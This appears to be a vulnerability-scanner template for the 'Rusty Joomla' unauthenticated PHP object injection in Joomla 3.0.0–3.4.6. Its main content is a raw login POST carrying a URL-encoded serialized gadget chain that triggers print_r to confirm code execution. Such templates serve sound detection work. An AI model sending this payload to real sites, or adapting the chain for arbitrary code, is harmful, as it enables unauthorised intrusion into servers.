id: rusty-joomla
info:
  name: Rusty Joomla RCE - Unauthenticated PHP Object Injection in Joomla CMS
  author:
  - l0ne1y
  description: |-
    Remote code execution vulnerability in Joomla versions 3.0.0 to 3.4.6
    An undocumented PHP object injection was discovered on Joomla CMS from version 3.0.0 to version 3.4.6 (released from 2012 to December 2015), leading to remote code execution.
  severity: critical
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program:
    http://www.joomla.org/

    Temporary fix:
    1. When executing a function that can execute strings as code, it is necessary to strictly verify the parameters passed by the user, and try to avoid user control of the parameters.
requests:
- matchers:
  - type: word
    condition: and
    words:
    - http://rusty.jooml/;pkwxhxqxmdkkmscotwvh
    - Failed to decode session object
  extractors:
  - name: csrf
    type: regex
    regex:
    - <input type="hidden" name="([0-9a-z]{32})" value="1"
    group: 1
    part: body
    internal: true
  raw:
  - |
    GET / HTTP/1.1
    Host: {{Hostname}}
  - |
    POST / HTTP/1.1
    Host: {{Hostname}}
    Content-Type: application/x-www-form-urlencoded

    username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1
  max-redirects: 2
  cookie-reuse: true
  redirects: true
